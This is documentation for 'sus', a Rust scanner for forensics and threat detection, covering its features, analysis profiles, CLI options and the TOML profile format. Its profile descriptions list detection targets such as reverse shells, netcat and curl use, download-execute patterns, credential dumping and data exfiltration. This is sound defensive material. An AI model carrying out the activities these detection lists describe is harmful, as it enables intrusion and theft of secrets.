sus - Systematic Universal Scanner

A high-performance, multi-threaded file analysis tool written in Rust for detecting suspicious files, extracting content from archives, and identifying security threats through pattern matching, YARA rules, and content analysis.

Overview

sus is a comprehensive file analysis and threat detection tool designed for security professionals, incident responders, and system administrators. It recursively scans directories, extracts content from archives and encoded files, analyzes file content using patterns and YARA rules, and provides a web-based interface for exploring results.

The tool is built for speed and scalability, leveraging Rust's performance and safety guarantees to process large file systems efficiently while maintaining low resource usage.

Key Features

Deep File Analysis: Recursively scan directories and automatically extract content from archives (ZIP, TAR, GZIP, BZIP2, XZ, 7Z, RAR), Office documents, PDFs, and EPUBs
ELF Analysis: Parse and extract metadata from Linux/Unix executables, shared libraries (.so), and object files including headers, sections, program headers, and symbol tables
Portable Executable (PE) Analysis: Parse and extract metadata from Windows executables (.exe, .dll) including headers, sections, imports, and exports
Mach-O Analysis: Parse and extract metadata from macOS/iOS executables, dynamic libraries (.dylib), and universal binaries including headers, segments, sections, and symbol tables
Windows Registry Analysis: Parse and analyze Windows Registry hive files (SAM, SYSTEM, SOFTWARE, SECURITY, DEFAULT, NTUSER.DAT, UsrClass.dat) without requiring Windows APIs
Memory Dump Analysis: Parse and analyze memory dumps from all major operating systems:
- Windows Minidump files (.dmp) - user-mode and kernel-mode crash dumps
- Linux ELF core dumps - process crash dumps in ELF format
- macOS ELF core dumps - process crash dumps in ELF format
Forensic Disk Image Analysis:
- E01/EWF Images: Automatic mounting and analysis with xmount/ewfmount (optional), or metadata extraction with conversion guidance
- AFF Images: Advanced Forensic Format support with xmount/affmount (optional)
- VDI Images: VirtualBox disk images with xmount support (optional)
- VHD Images: Microsoft Virtual Hard Disk format with xmount support (optional)
- VHDX Images: Microsoft Virtual Hard Disk v2 format with xmount support (optional)
- VMDK Images: VMware Virtual Machine Disk format with xmount support (optional)
- QCOW Images: QEMU Copy On Write disk image format with xmount support (optional)
- Raw Disk Images: Parse and extract partitions from raw disk images (dd output)
- MBR (Master Boot Record) partition table support
- GPT (GUID Partition Table) partition table support
- Automatic partition extraction and analysis
Pattern Matching: Search for suspicious patterns using string literals, regular expressions, and byte patterns
YARA-X Integration: Run YARA-X rules for advanced threat detection and malware identification
Content Decoding: Automatically decode Base64, hex, percent-encoding, HTML entities, and Unicode escape sequences
Multi-Directory Tagging: Tag files from different directories in a single analysis run for comparative analysis across servers or environments
Entropy Analysis: Calculate Shannon entropy to identify encrypted, compressed, or obfuscated files
File Hashing: Generate MD5, SHA1, and SHA256 hashes for all analyzed files
SQLite Database: Store analysis results in a structured SQLite database for easy querying and reporting
Web Interface: Built-in web server with rich UI for browsing files, viewing matches, and exploring analysis results
Command Execution: Execute platform-specific commands during analysis with OS/architecture filtering, command groups, and matrix expansion
Agent Mode: Deploy as an agent for remote analysis controlled by a central controller
Resumable Analysis: Detect interrupted scans and resume from where you left off
Customizable Profiles: Use TOML configuration files to define reusable analysis profiles

Installation

From Source

Requires Rust 1.70 or later:

git clone https://github.com/hisn-io/sus.git
cd sus
cargo build --release

Or use the Makefile:

make build-release

The compiled binaries will be available in target/release/:

sus - Main CLI tool
sus-agent - Agent for remote deployment
sus-controller - Controller for managing multiple agents

Quick Start

# Basic scan of current directory
sus .

# Scan with patterns
sus /path/to/scan --string-pattern "password" --regex-pattern "AKIA[0-9A-Z]{16}"

# Scan with a profile
sus /path/to/scan --profile profile.toml

# Scan without starting web server
sus /path/to/scan --no-server

#... (trimmed here in the docs copy for brevity; full README available at project root)

Profiles library

This directory contains a library of analysis profiles for different security scenarios and usage types. Profiles define patterns, YARA rules, decoding options, and signatures for detecting various security issues.

Directory Structure

profiles/
├── base/              # Base modular profiles
│   ├── credentials.toml       # Credential detection
│   ├── malware.toml           # Malware indicators
│   ├── web.toml               # Web vulnerabilities
│   ├── compliance.toml        # PII and regulated data
│   ├── crypto.toml            # Cryptographic operations
│   ├── network.toml           # Network operations
│   ├── forensics.toml         # Forensic artifacts (NEW)
│   ├── system-artifacts.toml  # System configs and logs (NEW)
│   └── browser-artifacts.toml # Browser history and data (NEW)
├── composite/         # Composite profiles combining base profiles
│   ├── security-audit.toml         # Comprehensive security audit
│   ├── full-scan.toml              # Complete security scan
│   ├── incident-response.toml      # Incident response and threat hunting
│   ├── pci-compliance.toml         # PCI DSS compliance
│   ├── web-app-security.toml       # Web application security
│   ├── cloud-security.toml         # Cloud security (AWS, Azure, GCP)
│   ├── forensic-investigation.toml # Digital forensics (NEW)
│   ├── live-response.toml          # Live response data (NEW)
│   └── windows-forensics.toml      # Windows artifacts (NEW)
├── modules/           # Reusable modules for dynamic targets (NEW)
│   ├── browser/       # Browser-specific modules
│   ├── windows/       # Windows artifact modules
│   ├── linux/         # Linux artifact modules
│   ├── memory/        # Memory analysis modules
│   └── email/         # Email artifact modules
├── targets/           # Named compound targets (KAPE-compatible) (NEW)
│   ├── KAPE_Triage.toml
│   ├── Quick_Triage.toml
│   ├── KAPE_BrowserHistory.toml
│   └── KAPE_EvidenceOfExecution.toml
└── tests/             # Test files for each profile
    ├── credentials/       # Credential pattern test files
    ├── malware/           # Malware pattern test files
    ├── web/               # Web vulnerability test files
    ├── compliance/        # PII detection test files
    ├── crypto/            # Cryptography test files
    ├── network/           # Network operations test files
    ├── forensics/         # Forensic artifacts test files (NEW)
    ├── system-artifacts/  # System artifacts test files (NEW)
    └── browser-artifacts/ # Browser artifacts test files (NEW)

Profile Types

See compound-targets.md for detailed module and target documentation.

Base Profiles

Base profiles are modular, single-purpose profiles that focus on specific security domains. They can be used standalone or combined via composite profiles.

credentials.toml

Detects exposed credentials and secrets including:

AWS access keys and secret keys
API keys (GitHub, Google, Slack, Stripe, etc.)
Private keys (RSA, SSH, PGP)
Database connection strings
JWT tokens and bearer tokens
OAuth tokens and webhooks

Usage:

sus /path/to/scan --profile profiles/base/credentials.toml

malware.toml

Detects malware indicators and suspicious patterns:

Reverse shells and command execution
PowerShell obfuscation and download-execute patterns
Meterpreter and exploit framework references
Anti-debugging and anti-VM techniques
DLL injection and privilege escalation
Credential dumping tools
Persistence mechanisms
Executable file headers (PE, ELF, Mach-O)

Usage:

sus /path/to/scan --profile profiles/base/malware.toml

web.toml

Detects web application vulnerabilities:

SQL injection patterns
Cross-site scripting (XSS)
Path traversal attacks
Command injection
LDAP injection
XXE (XML External Entity) attacks
Server-side template injection
Deserialization vulnerabilities
SSRF (Server-Side Request Forgery)
JSP scriptlets and expressions

Usage:

sus /path/to/scan --profile profiles/base/web.toml

compliance.toml

Detects PII and regulated data for compliance scanning:

Email addresses
Social Security Numbers (US, UK, Canada)
Credit card numbers (Visa, MasterCard, Amex, Discover)
Phone numbers (US and international)
IP addresses (IPv4, IPv6)
MAC addresses
Passport numbers
IBAN and bank account numbers
Medical record numbers
Health insurance information

Usage:

sus /path/to/scan --profile profiles/base/compliance.toml

crypto.toml

Detects cryptographic operations and weak crypto:

Hash algorithms (MD5, SHA1, SHA256)
Encryption algorithms (AES, DES, 3DES, RSA)
Cipher modes (ECB, CBC, GCM)
Hardcoded encryption keys and IVs
Password hashing (PBKDF2, BCrypt, SCrypt, Argon2)
Certificate handling
SSL/TLS operations
Digital signatures

Usage:

sus /path/to/scan --profile profiles/base/crypto.toml

network.toml

Detects network operations and potential data exfiltration:

HTTP, FTP, WebSocket URLs
Socket connections
wget and curl commands
Netcat usage
DNS queries
Proxy configurations
Base64 encoded URLs
Data exfiltration patterns
Remote desktop protocols
C2 beacon patterns

Usage:

sus /path/to/scan --profile profiles/base/network.toml

forensics.toml

Detects forensic artifacts and evidence of user activity (inspired by KAPE):

Windows artifacts (Event logs, Prefetch, Registry hives, ShimCache, Amcache, SRUM)
Browser artifacts (History, Cookies, Cache, Downloads)
Unix/Linux artifacts (Bash history, Auth logs, Syslog, Wtmp/Utmp, Lastlog)
Timeline artifacts (MFT records, timestamps)
Memory dumps (DMP, VMEM, hibernation files, page files)
Email artifacts (PST, OST, EML, MBOX)
File system artifacts (VSS, Recycle Bin, Thumbs.db, ADS)

Usage:

sus /path/to/scan --profile profiles/base/forensics.toml

system-artifacts.toml

Detects system configuration and administrative artifacts (inspired by UAC):

Windows system files (System32, DLLs, INI files, policies, scheduled tasks)
Unix/Linux configs (Crontab, Systemd services, Init scripts, Passwd/Shadow)
Log files (Application, Event, IIS, Apache/Nginx, Audit logs)
User activity (Profiles, Desktop, AppData, Temp directories)
Network configuration (Hosts file, interfaces, DNS config)
Startup and autorun locations (Registry Run keys, Startup folders)

Usage:

sus /path/to/scan --profile profiles/base/system-artifacts.toml

browser-artifacts.toml

Detects browser history, cookies, and user activity (inspired by KAPE browser modules):

Chrome/Chromium (History, Cookies, Login Data, Bookmarks, Extensions, Cache)
Firefox (Places, Cookies, Downloads, Logins, Bookmarks, Cache)
Edge (History, Cookies, WebCache)
Internet Explorer (WebCache, Index.dat)
Safari (History, Cookies, Cache)
Browser sessions, downloads, search queries
Saved passwords, form autofill, credit card data
Private browsing indicators

Usage:

sus /path/to/scan --profile profiles/base/browser-artifacts.toml

Composite Profiles

Composite profiles combine multiple base profiles using the includes directive, providing comprehensive analysis for specific use cases.

security-audit.toml

Comprehensive security audit combining credentials, malware, and web security profiles. Ideal for general security assessments.

Includes:

credentials.toml
malware.toml
web.toml

Usage:

sus /path/to/scan --profile profiles/composite/security-audit.toml

full-scan.toml

Complete security scan combining all base profiles. Use this for thorough analysis when you want maximum coverage.

Includes:

credentials.toml
malware.toml
web.toml
compliance.toml
crypto.toml
network.toml

Usage:

sus /path/to/scan --profile profiles/composite/full-scan.toml

incident-response.toml

Focused profile for incident response and threat hunting, emphasizing malware detection, network activity, and credential exposure.

Includes:

malware.toml
network.toml
credentials.toml

Additional patterns:

Log deletion and timestamp modification
Firewall modifications
Account creation
Lateral movement techniques

Usage:

sus /compromised/system --profile profiles/composite/incident-response.toml

pci-compliance.toml

Payment Card Industry Data Security Standard (PCI DSS) compliance scanning.

Includes:

compliance.toml
credentials.toml
crypto.toml

Additional patterns:

Magnetic stripe data
CVV/CVC codes
PIN data
Primary Account Numbers (PAN)
Payment gateway configurations

Usage:

sus /payment/system --profile profiles/composite/pci-compliance.toml

web-app-security.toml

Comprehensive web application vulnerability scanning.

Includes:

web.toml
credentials.toml
crypto.toml

Additional patterns:

Hardcoded database credentials
Exposed admin panels
Default credentials
Session tokens in URLs
Information disclosure

Usage:

sus /var/www --profile profiles/composite/web-app-security.toml

cloud-security.toml

Cloud-specific security issues for AWS, Azure, and GCP.

Includes:

credentials.toml

Additional patterns:

AWS ARNs, access keys, S3 buckets
Azure storage keys, connection strings, client secrets
GCP service account keys, project IDs, cloud storage
Terraform state files
Kubernetes secrets
Docker registry credentials

Usage:

sus /cloud/infrastructure --profile profiles/composite/cloud-security.toml

forensic-investigation.toml

Comprehensive digital forensics investigation profile (inspired by KAPE).

Includes:

forensics.toml
system-artifacts.toml
browser-artifacts.toml
malware.toml
network.toml

Additional patterns:

Evidence files (E01, raw, DD, AFF)
Forensic images (VMDK, VHD, VHDX)
Timeline files
Case files and chain of custody

Usage:

sus /evidence/disk-image --profile profiles/composite/forensic-investigation.toml

live-response.toml

Live response and volatile data collection (inspired by UAC).

Includes:

system-artifacts.toml
malware.toml
network.toml

Additional patterns:

Running processes and PIDs
Active network connections
Logged-in users and system uptime
Volatile registry keys (RunMRU, TypedURLs, UserAssist, MUICache)
Command history (PowerShell, CMD, Bash)
Live malware indicators (suspicious processes, rootkits, code injection)

Usage:

sus /live/system --profile profiles/composite/live-response.toml

windows-forensics.toml

Windows-specific forensic artifact detection (inspired by KAPE Windows targets).

Includes:

forensics.toml
system-artifacts.toml
browser-artifacts.toml

Additional patterns:

Registry paths (HKLM, HKCU, HKCR)
Registry artifacts (RecentDocs, ComDlg32, MountPoints2)
Security Event IDs (4624, 4625, 4672, 4720, 4732)
Execution artifacts (Prefetch, AppCompatCache, BAM/DAM, Windows Timeline)
NTFS features (ADS, Zone.Identifier, USN Journal)
Network profiles and wireless networks
Credential Manager and Windows Vault
DPAPI master keys and LSA secrets

Usage:

sus /windows/forensics --profile profiles/composite/windows-forensics.toml

Module and Target System (NEW)

The enhanced profile system supports dynamic module loading and KAPE-compatible compound targets.

Using Named Targets

# KAPE-style triage collection
sus /path --target KAPE_Triage --collect

# Quick triage for rapid assessment
sus /path --target Quick_Triage

# Browser history collection
sus /path --target KAPE_BrowserHistory

# Windows execution artifacts
sus /path --target KAPE_EvidenceOfExecution

Using Modules

# Single module
sus /path --target browser/chrome

# Multiple modules
sus /path --target browser/chrome --target browser/firefox

# All modules in a category
sus /path --target windows/*

# Combine with profiles
sus /path --profile base/malware.toml --target browser/all-browsers

Runtime Module Selection

# Enable specific modules
sus /path --target KAPE_Triage --enable-module browser/chrome

# Disable modules
sus /path --target KAPE_Triage --disable-module windows/event-logs

# List available modules
sus --list-modules

# Show module details
sus --show-module browser/chrome

Module Categories

browser/ - Chrome, Firefox, Edge, Safari artifacts
windows/ - Registry, execution, event logs
linux/ - System logs, bash history, user activity
memory/ - Memory dumps, hibernation files
email/ - Outlook, Thunderbird artifacts

For complete documentation, see:

compound-targets.md - Module and target system guide
modules/README.md - Module development guide

Profile Features

Pattern Types

String: Literal string matching (case-sensitive or case-insensitive)
Regex: Regular expression pattern matching
Bytes: Hex byte pattern matching

Content Decoding

Profiles can specify which content encodings to decode:

base64 - Base64 encoding
hex - Hexadecimal encoding
percent-encoding - URL percent encoding
html-entity - HTML entity encoding
unicode-escape-sequences - Unicode escape sequences

File Filtering Options

Path Globs

Include or exclude files based on path patterns:

include-path-globs = ["*.log", "*.txt"]
exclude-path-globs = ["**/node_modules/**", "**/.git/**"]

File Size Limit

Set maximum file size to analyze:

max-file-size = 104857600  # 100 MiB

Directory Tagging

Tag files based on their directory path for comparative analysis:

# Default tag for files not matching any tag-dir
default-tag = "default"

# Map directories to tags
[[tag-dirs-config]]
  path = "/server1"
  tag = "server1"

[[tag-dirs-config]]
  path = "/server2"
  tag = "server2"

Time-Based Filtering

Only analyze files modified within a specific time range. Supports:

ISO 8601 timestamps: 2024-01-15T10:30:00Z
Date format: 2024-01-15
Relative times: 7d (7 days), 30d (30 days), 1h (1 hour), 1w (1 week), 1m (1 month), 1y (1 year)

# Only analyze files modified in the last 7 days
modified-after = "7d"

# Only analyze files modified before yesterday
modified-before = "1d"

# Use specific dates
modified-after = "2024-01-15"
modified-before = "2024-12-31"

Target Loading

Load KAPE-style targets and modules directly from profiles:

# Load named targets or module paths
targets = ["KAPE_Triage", "browser/chrome"]

# Enable specific modules
enable-modules = ["browser/firefox"]

# Disable specific modules
disable-modules = ["windows/event-logs"]

Signatures

Custom SQL signatures query the analysis database to find complex patterns:

[[signatures]]
  name = "High Entropy Files"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.5"

Profile Inheritance

Composite profiles use the includes directive to inherit from other profiles:

includes = [
  "../base/credentials.toml",
  "../base/malware.toml"
]

Testing Profiles

Each base profile has corresponding test files in the tests/ directory. These files contain patterns that should be detected by their respective profiles.

Running Tests

Test individual profiles:

# Test credentials profile
sus profiles/tests/credentials --profile profiles/base/credentials.toml --output-dir /tmp/sus-test-creds

# Test malware profile
sus profiles/tests/malware --profile profiles/base/malware.toml --output-dir /tmp/sus-test-malware

# Test web profile
sus profiles/tests/web --profile profiles/base/web.toml --output-dir /tmp/sus-test-web

# Test compliance profile
sus profiles/tests/compliance --profile profiles/base/compliance.toml --output-dir /tmp/sus-test-compliance

# Test crypto profile
sus profiles/tests/crypto --profile profiles/base/crypto.toml --output-dir /tmp/sus-test-crypto

# Test network profile
sus profiles/tests/network --profile profiles/base/network.toml --output-dir /tmp/sus-test-network

Test composite profiles:

# Test security audit profile
sus profiles/tests --profile profiles/composite/security-audit.toml --output-dir /tmp/sus-test-audit

# Test full scan profile
sus profiles/tests --profile profiles/composite/full-scan.toml --output-dir /tmp/sus-test-full

Viewing Test Results

After running a test, view the results in the web interface:

sus --server-only --output-dir /tmp/sus-test-creds

Or query the SQLite database directly:

sqlite3 /tmp/sus-test-creds/analysis.db "SELECT pattern_name, COUNT(*) as matches FROM pattern_matches GROUP BY pattern_name ORDER BY matches DESC"

Creating Custom Profiles

You can create your own custom profiles by combining existing profiles or defining new patterns.

Example: Custom Application Security Profile

# my-app-security.toml
includes = [
  "profiles/base/credentials.toml",
  "profiles/base/web.toml"
]

# Application-specific patterns
[[patterns]]
  name = "Internal API Key"
  pattern = "MYAPP-[A-Z0-9]{32}"
  type = "regex"

[[patterns]]
  name = "Legacy Authentication"
  pattern = "auth_v1_token"
  case-insensitive = true
  type = "string"

[[signatures]]
  name = "Application Security Issues"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name LIKE '%API Key%' OR pattern_name = 'Legacy Authentication'"

Best Practices

Start with base profiles for focused analysis on specific security domains
Use composite profiles for comprehensive scans
Create custom profiles for application-specific security requirements
Test profiles against known test files before production use

Combine multiple profiles on the command line for custom analysis:

sus /path --profile profiles/base/credentials.toml --profile profiles/base/malware.toml

Review signatures to understand what complex patterns are being detected
Adjust decode options based on your target files' encoding patterns

Performance Considerations

Base profiles: Fast, focused scanning
Composite profiles: Slower due to multiple pattern sets
Full scan profile: Most comprehensive but slowest
Max file size: Set appropriately for your use case (default: 100MB in full-scan)
Decode options: More decoders = slower analysis but better detection

Contributing

To add new profiles:

Create base profiles in profiles/base/ for new security domains
Add test files in profiles/tests/ with patterns your profile should detect
Create composite profiles in profiles/composite/ for common use cases
Update this README with profile documentation
Test profiles against test files to verify detection accuracy

YARA Rules

sus supports YARA-X rules for advanced malware detection. YARA rules can be added to any profile:

yara-x-rules = ["path/to/yara/rules"]

For detailed information on integrating YARA rules, including:

Recommended YARA rule sources (Elastic, YARA-Rules, Signature-Base)
Creating custom YARA rules
Best practices and performance optimization
Example workflows

See the YARA Integration Guide for complete documentation.

Quick start with Elastic rules:

# Download Elastic endpoint protection YARA rules
git clone https://github.com/elastic/protections-artifacts.git yara-rules/elastic

# Use in a profile
yara-x-rules = ["yara-rules/elastic/yara/rules"]

License

These profiles are part of the sus project and are licensed under Apache-2.0.

CLI Options Reference

This document provides a comprehensive reference for all command-line options available in the sus tool.

Note: This documentation is auto-generated from the source code. Run make docs to regenerate.

Usage

sus [OPTIONS] [PATH]

Arguments

Argument	Description	Default
`PATH`	The path to search for suspicious files	`.` (current directory)

Options

Pattern Matching

Option	Description
`--string-pattern <PATTERN>`	String pattern to search for (can be specified multiple times)
`--regex-pattern <PATTERN>`	Regex pattern to search for (can be specified multiple times)
`--bytes-regex-pattern <PATTERN>`	Bytes regex pattern to search for (hex format, can be specified multiple times)

Content Decoding

Option	Description
`-d, --decode <ENCODING>`	Decode content with the given encoding. Can be specified multiple times. Possible values: `base64`, `hex`, `percent-encoding`, `html-entity`, `unicode-escape-sequences`

Output Configuration

Option	Description	Default
`-o, --output-dir <PATH>`	The output directory for analysis results	`./output`
`--parent-path <PATH>`	Parent path to use for the output (joined with the scan path)	-

Profile Configuration

Option	Description
`--profile <PATH>`	Profile file(s) to use in TOML format. Can be specified multiple times to merge multiple profiles. If not specified, looks for `profile.toml` in the current directory

YARA Rules

Option	Description
`--yara-x-rules <DIR>`	Directory containing YARA-X rules to use

File Filtering

Option	Description
`--max-file-size <BYTES>`	Maximum file size to analyze (in bytes)
`--include-path-globs <GLOB>`	Only analyze files matching the given glob pattern (can be specified multiple times)
`--exclude-path-globs <GLOB>`	Exclude files matching the given glob pattern (can be specified multiple times)
`--modified-after <TIMESTAMP>`	Only analyze files modified after this timestamp (ISO 8601, date, or relative like '7d', '30d', '1h')
`--modified-before <TIMESTAMP>`	Only analyze files modified before this timestamp (ISO 8601, date, or relative like '7d', '30d', '1h')

Tagging

Option	Description	Default
`--tag-dir <PATH:TAG>`	Tag directories with format 'path:tag' (e.g., '/server1:production'). Can be specified multiple times for multi-directory tagging
`--default-tag <TAG>`	Default tag for files not matching any tag-dir	Empty string

Server Options

Option	Description
`--no-server`	Don't start the web server after analysis
`--server-only`	Only start the web server (skip analysis)
`--allow-any-host`	Allow network access from any host (not just localhost). Security Warning: This exposes the web interface to network access. Only use in trusted network environments.

Analysis Control

Option	Description
`-v, --verbose`	Enable verbose output (can be used multiple times for more verbosity)
`--force-new`	Force a new analysis, wiping the existing database
`--collect`	Collect matched artifacts to the output directory, preserving metadata

Targets and Modules

Option	Description
`--target <TARGET>`	Target(s) to use - can be a module path (e.g., 'browser/chrome') or named target (e.g., 'KAPE_Triage'). Can be specified multiple times
`--enable-module <MODULE>`	Enable specific module(s) when using a target
`--disable-module <MODULE>`	Disable specific module(s) when using a target
`--list-modules`	List all available modules and exit
`--list-targets`	List all available targets and exit
`--show-module <MODULE>`	Show details of a specific module and exit
`--show-target <TARGET>`	Show details of a specific target and exit

Timeline Generation

Option	Description
`--generate-timeline <FORMAT>`	Generate timeline from analyzed files (CSV, JSON, or JSONL format)
`--timeline-output <PATH>`	Timeline output file path (defaults to output_dir/timeline.{format})
`--timeline-include-created`	Include file creation timestamps in timeline (default: true)
`--timeline-include-modified`	Include file modification timestamps in timeline (default: true)
`--timeline-include-accessed`	Include file access timestamps in timeline (default: true)
`--timeline-filter-tag <TAG>`	Filter timeline by tag(s) - can be specified multiple times

System Snapshot

Option	Description
`--system-snapshot`	Capture system snapshot at analysis start (processes, network connections, modules, etc.)
`--system-snapshot-output <PATH>`	System snapshot output file path (defaults to output_dir/system_snapshot.json)

Windows Registry Parsing

Option	Description
`--parse-registry`	Parse Windows Registry files for forensic artifacts (UserAssist, ShimCache, Amcache, BAM/DAM, etc.)
`--registry-artifacts <ARTIFACTS>`	Registry artifacts to parse (comma-separated). Options: userassist, shimcache, amcache, bam, dam, recentdocs, network, usb. If not specified, all artifacts are parsed
`--registry-output <PATH>`	Registry parsing output file path (defaults to output_dir/registry_artifacts.{format})
`--registry-format <FORMAT>`	Registry output format: `csv` or `json` (default: csv)

Windows Event Log Parsing

Option	Description
`--parse-evtx`	Parse Windows Event Log (.evtx) files for forensic analysis
`--evtx-event-ids <IDS>`	Event IDs to filter (comma-separated, e.g., 4624,4625,4634). If not specified, all events are parsed
`--evtx-sources <SOURCES>`	Event sources to filter (comma-separated). If not specified, all sources included
`--evtx-levels <LEVELS>`	Event levels to filter (comma-separated: Critical, Error, Warning, Information, Verbose)
`--evtx-output <PATH>`	Event log parsing output file path (defaults to output_dir/evtx_events.{format})
`--evtx-format <FORMAT>`	Event log output format: `csv` or `json` (default: csv)
`--evtx-summary`	Generate event log summary report

Triage Reporting

Option	Description
`--triage-report`	Generate triage report with risk scoring
`--triage-min-score <SCORE>`	Minimum triage score to include in report (0-100, default: 0 for all files)
`--triage-output <PATH>`	Triage report output file path (defaults to output_dir/triage_report.json)
`--triage-include-all`	Include all scores in triage report (not just top 100)

Help and Version

Option	Description
`-h, --help`	Print help information
`-V, --version`	Print version information

Examples

Basic Scan

# Scan current directory
sus .

# Scan specific path with custom output
sus /path/to/scan --output-dir ./results

Pattern Matching

# Search for specific patterns
sus /data \
  --regex-pattern "AKIA[0-9A-Z]{16}" \
  --string-pattern "password" \
  --decode base64

Using Profiles

# Use a single profile
sus /data --profile security.toml

# Merge multiple profiles
sus /data --profile base.toml --profile security.toml

Multi-Directory Tagging

# Tag files from different directories
sus /backups \
  --tag-dir /backups/server1:production \
  --tag-dir /backups/server2:staging \
  --default-tag unknown

Forensic Analysis

# Full forensic analysis with timeline and registry parsing
sus /forensic/image \
  --generate-timeline csv \
  --parse-registry \
  --parse-evtx \
  --triage-report \
  --system-snapshot

Using Targets

# List available targets
sus --list-targets

# Use a pre-defined target
sus /data --target KAPE_Triage

# Enable/disable specific modules
sus /data --target KAPE_Triage --disable-module windows/event-logs

Profile Options Reference

This document provides a comprehensive reference for all profile configuration options available in sus TOML profile files.

Note: This documentation is auto-generated from the source code. Run make docs to regenerate.

Overview

Profiles are TOML configuration files that define how files should be analyzed. They can include:

Pattern matching rules (string, regex, bytes)
YARA-X rules for malware detection
Content decoding options
File size limits
Path include/exclude globs
Custom SQL signatures

Profile Location

By default, sus looks for profile.toml in the current directory. You can specify a different profile with --profile:

sus /data --profile /path/to/custom.toml

Basic Structure

# Include other profiles (optional)
includes = ["base.toml", "security.toml"]

# Content decoding options
decode = ["base64", "hex", "percent-encoding", "html-entity", "unicode-escape-sequences"]

# Maximum file size to analyze (in bytes)
max-file-size = 104857600  # 100 MiB

# Glob patterns for including files
include-path-globs = ["**/*.jar", "**/*.war"]

# Glob patterns for excluding files
exclude-path-globs = ["**/node_modules/**", "**/vendor/**"]

# Default tag for files
tag = "default"

# Pattern definitions
[[patterns]]
  name = "Pattern Name"
  pattern = "pattern-string"
  type = "string"  # or "regex" or "bytes"
  case-insensitive = false  # optional, default: false

# YARA rule directories
yara-x-rules = ["./yara-rules/"]

# Custom SQL signatures
[[signatures]]
  name = "Signature Name"
  query = "SELECT sha256 FROM unique_files WHERE condition"

Top-Level Options

`includes`

Include other profile files, which will be merged with the current profile.

includes = ["base.toml", "security.toml"]

Relative paths are resolved relative to the profile file's directory
Circular dependencies are detected and prevented
All included profiles are merged with automatic deduplication

`decode`

Content decoding options to apply during analysis.

decode = ["base64", "hex", "percent-encoding", "html-entity", "unicode-escape-sequences"]

Value	Description
`base64`	Decode Base64-encoded content
`hex`	Decode hexadecimal-encoded content
`percent-encoding`	Decode URL percent-encoded content (e.g., `%20`)
`html-entity`	Decode HTML entities (e.g., `&`)
`unicode-escape-sequences`	Decode Unicode escape sequences (e.g., `\u0041`)

`max-file-size`

Maximum file size to analyze, in bytes.

max-file-size = 104857600  # 100 MiB

Files larger than this size will be skipped during analysis.

`include-path-globs`

Glob patterns for including files. Only files matching at least one pattern will be analyzed.

include-path-globs = ["**/*.jar", "**/*.war", "**/*.class"]

`exclude-path-globs`

Glob patterns for excluding files. Files matching any pattern will be skipped.

exclude-path-globs = ["**/node_modules/**", "**/vendor/**", "**/.git/**"]

`tag`

Default tag to apply to files analyzed with this profile.

tag = "production"

`yara-x-rules`

Directories containing YARA-X rule files (.yar or .yara extension).

yara-x-rules = ["./yara-rules/", "/shared/yara/"]

Pattern Definitions

Patterns are defined using the [[patterns]] array table syntax.

Pattern Fields

Field	Type	Required	Description
`name`	string	Yes	Human-readable name for the pattern
`pattern`	string	Yes	The pattern to match
`type`	string	Yes	Pattern type: `string`, `regex`, or `bytes`
`case-insensitive`	boolean	No	Case-insensitive matching (default: false)

Pattern Types

String Patterns

Literal string matching:

[[patterns]]
  name = "Private Key Header"
  pattern = "-----BEGIN PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "Password Reference"
  pattern = "password"
  type = "string"
  case-insensitive = true

Regex Patterns

Regular expression matching:

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "Email Address"
  pattern = "[a-z0-9._%+-]+@[a-z0-9.-]+\\.[a-z]{2,}"
  type = "regex"
  case-insensitive = true

Bytes Patterns

Hexadecimal byte patterns:

# PDF file signature
[[patterns]]
  name = "PDF Header"
  pattern = "25:50:44:46"  # %PDF in hex
  type = "bytes"

# PNG file signature
[[patterns]]
  name = "PNG Header"
  pattern = "89:50:4E:47:0D:0A:1A:0A"
  type = "bytes"

Signature Definitions

Signatures are custom SQL queries executed against the analysis database.

Signature Fields

Field	Type	Required	Description
`name`	string	Yes	Human-readable name for the signature
`query`	string	Yes	SQL SELECT query to execute

Signature Rules

Queries must start with SELECT
Queries must reference at least one valid table: unique_files, files, pattern_matches, or analysis
Dangerous SQL keywords are not allowed: DROP, DELETE, INSERT, UPDATE, ALTER, CREATE, TRUNCATE, EXEC, EXECUTE, PRAGMA

Available Tables for Signatures

`unique_files`

Column	Type	Description
`sha256`	TEXT	SHA-256 hash (primary key)
`sha1`	TEXT	SHA-1 hash
`md5`	TEXT	MD5 hash
`file_size`	INTEGER	File size in bytes
`mime_type_for_content`	TEXT	MIME type based on content
`shannon_entropy`	REAL	Shannon entropy value

`files`

Column	Type	Description
`path`	TEXT	File path (primary key)
`file_name`	TEXT	File name
`sha256`	TEXT	SHA-256 hash
`file_created`	TEXT	Creation timestamp
`file_modified`	TEXT	Modification timestamp
`file_accessed`	TEXT	Access timestamp
`mime_types_from_file_extension`	TEXT	MIME types from extension
`is_symbolic_link`	INTEGER	Whether file is a symlink
`is_extracted_file`	INTEGER	Whether file was extracted
`is_decoded_file`	INTEGER	Whether file was decoded
`tag`	TEXT	Tag assigned to file

`pattern_matches`

Column	Type	Description
`id`	INTEGER	Match ID (primary key)
`sha256`	TEXT	SHA-256 hash of matched file
`pattern_name`	TEXT	Name of matching pattern
`match_type`	TEXT	Type of match
`match`	TEXT	Matched content
`location`	TEXT	Location of match
`length`	INTEGER	Length of match

`analysis`

Column	Type	Description
`sha256`	TEXT	SHA-256 hash (primary key)
`notes`	TEXT	Analysis notes
`is_suspicious`	INTEGER	Whether file is suspicious
`tags`	TEXT	Tags assigned to file

Signature Examples

[[signatures]]
  name = "High Entropy Files"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.5"

[[signatures]]
  name = "Large Suspicious Files"
  query = "SELECT sha256 FROM unique_files WHERE file_size > 1000000 AND sha256 IN (SELECT sha256 FROM analysis WHERE is_suspicious = 1)"

[[signatures]]
  name = "Files with SQL Injection"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name = 'SQL Statement'"

[[signatures]]
  name = "Files by Tag"
  query = "SELECT path FROM files WHERE tag = 'production'"

Profile Merging

When multiple profiles are specified, they are merged with automatic deduplication:

Via Command Line

sus /data --profile base.toml --profile security.toml --profile custom.toml

Via Includes

# main.toml
includes = ["base.toml", "security.toml"]

[[patterns]]
  name = "Additional Pattern"
  pattern = "custom"
  type = "string"

Merging Rules

